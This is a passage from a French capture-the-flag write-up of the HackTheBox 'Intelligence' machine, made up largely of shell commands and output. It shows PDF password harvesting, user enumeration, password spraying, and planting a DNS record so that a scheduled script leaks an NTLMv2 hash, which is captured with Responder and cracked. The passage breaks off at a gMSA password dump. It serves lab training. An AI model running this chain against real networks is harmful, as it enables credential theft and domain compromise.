class="k">for</span> f in *.pdf </span></span><span class="line"><span class="cl"><span class="k">do</span> </span></span><span class="line"><span class="cl"> pdftotext <span class="nv">$f</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl">$ cat *.txt <span class="p">|</span> grep -i password -A3 -B3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">New Account Guide </span></span><span class="line"><span class="cl">Welcome to Intelligence Corp! </span></span><span class="line"><span class="cl">Please login using your username and the default password of: </span></span><span class="line"><span class="cl">NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">After logging in please change your password as soon as possible. </span></span></code></pre></td></tr></table> </div> </div><p>On trouve également le message suivant:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Internal IT Update </span></span><span class="line"><span class="cl">There has recently been some outages on our web servers. Ted has gotten a </span></span><span class="line"><span class="cl">script in place to <span class="nb">help</span> notify us <span class="k">if</span> this happens again. </span></span><span class="line"><span class="cl">Also, after discussion following our recent security audit we are in the process </span></span><span class="line"><span class="cl">of locking down our service accounts. </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-list-from-pdfs-creators">User list from pdfs creators </h3><p>En utilisant <strong>exiftool</strong>, on peut recuperer beaucoup d&rsquo;information sur les PDFs et notamment le nom des createurs ayant généré les pdfs. On peut alors obtenir une liste d&rsquo;utilisateurs potentiels</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">exiftool pdfs/*.pdf <span class="p">|</span> grep -i creator <span class="p">|</span> awk <span class="s1">&#39;{print $3}&#39;</span> </span></span><span class="line"><span class="cl">William.Lee </span></span><span class="line"><span class="cl">Scott.Scott </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Tiffany.Molina &lt;----------- </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Ian.Duncan </span></span><span class="line"><span class="cl">Richard.Williams </span></span></code></pre></td></tr></table> </div> </div><p>Avec kerbrute, on peut vérifier si les utilisateurs existent. Une très grosse partie existe en vérité. Avec nxc on effectue un password spray et on trouve les credentials suivants: <code>intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt </span></span><span class="line"><span class="cl"> __ __ __ </span></span><span class="line"><span class="cl"> / /_____ _____/ /_ _______ __/ /____ </span></span><span class="line"><span class="cl"> / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\ </span></span></span><span class="line"><span class="cl"> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ </span></span><span class="line"><span class="cl">/_/<span class="p">|</span>_<span class="p">|</span><span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Version: dev <span class="o">(</span>n/a<span class="o">)</span> - 09/03/25 - Ronnie Flathers @ropnop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; Using KDC<span class="o">(</span>s<span class="o">)</span>: </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; dc.intelligence.htb:88 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Stephanie.Young@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Veronica.Patel@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Jason.Wright@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: David.Reed@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Scott.Scott@intelligence.htb </span></span><span class="line"><span class="cl">...... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u users.txt -p pass.txt </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\W</span>illiam.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\J</span>ason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\R</span>ichard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>iffany.Molina:NewIntelligenceCorpUser9876 </span></span></code></pre></td></tr></table> </div> </div><h3 id="tiffanymolina--user-flag">Tiffany.Molina : user flag </h3><p>On trouve un Share <strong>User</strong> accessible en lecture par Tiffany. On trouve finalement les fichiers de Tiffany et le flag user.txt</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/users -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Administrator D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> All Users DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Default DHR <span class="m">0</span> Mon Apr <span class="m">19</span> 04:17:40 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Default User DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> desktop.ini AHS <span class="m">174</span> Sat Sep <span class="m">15</span> 09:11:27 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Public DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Ted.Graves D <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Tiffany.Molina D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> Tiffany.molina </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\&gt;</span> <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> user.txt AR <span class="m">34</span> Wed Sep <span class="m">3</span> 21:31:06 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> get user.txt </span></span><span class="line"><span class="cl">getting file <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt of size <span class="m">34</span> as user.txt <span class="o">(</span>0.2 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.2 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">359b.....159e </span></span></code></pre></td></tr></table> </div> </div><h3 id="rusthound-bloodhound">Rusthound bloodhound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ rusthound -d intelligence.htb -u <span class="s2">&#34;Tiffany.Molina&#34;</span>@<span class="s2">&#34;intelligence.htb&#34;</span> -p <span class="s2">&#34;NewIntelligenceCorpUser9876&#34;</span> -o /workspace/Intelligence/bloodhount_data --zip -n 10.10.10.248 </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl">Initializing RustHound at 16:50:28 on 09/03/25 </span></span><span class="line"><span class="cl">Powered by g0h4n from OpenCyber </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound<span class="o">]</span> Verbosity level: Info </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Connected to INTELLIGENCE.HTB Active Directory! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Starting data collection... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> All data collected <span class="k">for</span> NamingContext <span class="nv">DC</span><span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Starting the LDAP objects parsing... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser::bh_41<span class="o">]</span> MachineAccountQuota: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Parsing LDAP objects finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Starting checker to replace some values... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Checking and replacing some values finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">43</span> users parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">63</span> groups parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> computers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> ous parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> domains parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> gpos parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> containers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> /workspace/Intelligence/bloodhount_data/20250903165028_intelligence-htb_rusthound.zip created! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RustHound Enumeration Completed at 16:50:29 on 09/03/25! Happy Graphing! </span></span></code></pre></td></tr></table> </div> </div><h2 id="tiffanymolina---tedgraves">Tiffany.Molina -&gt; Ted.Graves </h2><h3 id="smb--it-share">SMB : IT Share </h3><p>En se connectant au share <strong>IT</strong> on remarque un script <strong>powershell</strong>. Ce script parcourt tous les domaines DNS enregistrés commencant par &ldquo;web&rdquo; puis effectue une requête HTTP avec Invoke-WebRequest. Si le site n&rsquo;est pas actif, alors la requête echoue et un mail est envoyé à Ted.</p> <p>Il est indiqué que le script est executé toutes les 5mn, et vraisembablement est executé par Ted lui même. On remarque l&rsquo;utilisation du paramètre <strong>-UseDefaultCredentials</strong> ce qui signifie que les creds de celui qui l&rsquo;execute sont transmis lors de la requête.</p> <p>Si on arrive à detourner le script pour lui faire faire une requête vers notre ordinateur, on pourrait recupérer le mot de passe de Ted.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/it -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> downdetector.ps1 A <span class="m">1046</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453177</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get downdetector.ps1 </span></span><span class="line"><span class="cl">getting file <span class="se">\d</span>owndetector.ps1 of size <span class="m">1046</span> as downdetector.ps1 <span class="o">(</span>13.4 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 13.4 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 17:13:40 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># cat downdetector.ps1 </span> </span></span><span class="line"><span class="cl">��# Check web server status. Scheduled to run every 5min </span></span><span class="line"><span class="cl">Import-Module ActiveDirectory </span></span><span class="line"><span class="cl">foreach<span class="o">(</span><span class="nv">$record</span> in Get-ChildItem <span class="s2">&#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> Where-Object Name -like <span class="s2">&#34;web*&#34;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"><span class="nv">$request</span> <span class="o">=</span> Invoke-WebRequest -Uri <span class="s2">&#34;http://</span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2">&#34;</span> -UseDefaultCredentials </span></span><span class="line"><span class="cl"><span class="k">if</span><span class="o">(</span>.StatusCode -ne 200<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">Send-MailMessage -From <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -To <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -Subject <span class="s2">&#34;Host: </span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2"> is down&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">{}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>L&rsquo;idée est donc:</p> <ul> <li>Créer un record DNS commençant par &ldquo;web&rdquo; avec le compte de Tiffany</li> <li>Mettre en place un <strong>responder</strong>, qui attend de recevoir une requête et nous donnera un hachage</li> <li>Déchiffrer le hachage.</li> </ul> <h3 id="new-dns-record">New DNS Record </h3><p>On crée un nouveau DNS record : <strong>web666</strong>. Il pointe vers notre IP. Pour cela on peut utiliser l&rsquo;outil <strong>dnstool.py</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dnstool.py -u <span class="s1">&#39;intelligence.htb\Tiffany.Molina&#39;</span> -p <span class="s1">&#39;NewIntelligenceCorpUser9876&#39;</span> -r web666 -a add -d 10.10.16.10 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Connecting to host... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Binding to host </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bind OK </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Adding new record </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> LDAP operation completed successfully </span></span></code></pre></td></tr></table> </div> </div><h3 id="responder">Responder </h3><p>On se met en attente d&rsquo;une requête, avec la commande <strong>responder</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 22:43:49 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># responder -I tun0 -w -F </span> </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Client : 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Username : intelligence<span class="se">\T</span>ed.Graves </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:BF2803FDDC9EEF7CD931A308E83AAF83:0101000000000000579387554E1DDC014DF34E0577DDBE3A0000000002000800510054003200360001001E00570049004E002D00440046003200570030004700530042004500390050000400140051005400320036002E004C004F00430041004C0003003400570049004E002D00440046003200570030004700530042004500390050002E0051005400320036002E004C004F00430041004C000500140051005400320036002E004C004F00430041004C00080030003000000000000000000000000020000027B3134561E5EAEC1547E28450320466E1AC51EF296269768842659E2D2AD00B0A001000000000000000000000000000000000000900380048005400540050002F007700650062003600360036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ted-ntlmv2-hash">Ted NTLMv2 Hash </h3><p>On effectue une attaque par dictionnaire sur le hachage NTLMv2 de Ted.graves et on obtient les credentials suivants : Ted : <code>Mr.Teddy</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">TED.GRAVES::intelligence:112.......000:Mr.Teddy </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5600</span> <span class="o">(</span>NetNTLMv2<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: TED.GRAVES::intelligence:1122334455667788:bf2803fdd...000000 </span></span><span class="line"><span class="cl">Time.Started.....: Wed Sep <span class="m">3</span> 22:47:36 <span class="m">2025</span> <span class="o">(</span><span class="m">2</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Wed Sep <span class="m">3</span> 22:47:38 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u Ted.graves -p <span class="s1">&#39;Mr.Teddy&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>ed.graves:Mr.Teddy </span></span></code></pre></td></tr></table> </div> </div><h2 id="tedgraves---svc_int">Ted.Graves -&gt; svc_int$ </h2><h3 id="readgmsapassword-right-on-svc_int">ReadGMSAPassword Right on svc_int$ </h3><p>En utilisant bloodhound, on découvre que Ted.Graves fait parti du groupe <strong>ITSupport</strong> qui a le droit <strong>ReadGMSAPassword</strong> sur l&rsquo;utilisateur <strong>svc_int$</strong>.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int.png" width="1134" height="731" srcset="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_c713dae335ef7ad7.png 480w, https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_3e23e0760d3b044d.png 1024w" loading="lazy" alt="bloodhound: Ted -&gt; svc_int" class="gallery-image" data-flex-grow="155" data-flex-basis="372px" ></p> <p>En utilisant la commande gMSADumper.py on peut alors dumper le hachage de <strong>svc_int$</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gMSADumper.py -u <span class="s1">&#39;Ted.Graves&#39;</span> -p <span class="s1">&#39;Mr.Teddy&#39;</span> -d <span class="s1">&#39;intelligence.htb&#39;</span> </span></span><span class="line"><span class="cl">Users or groups who can <span class="nb">read</span> password <span class="k">for</span> svc_int$: 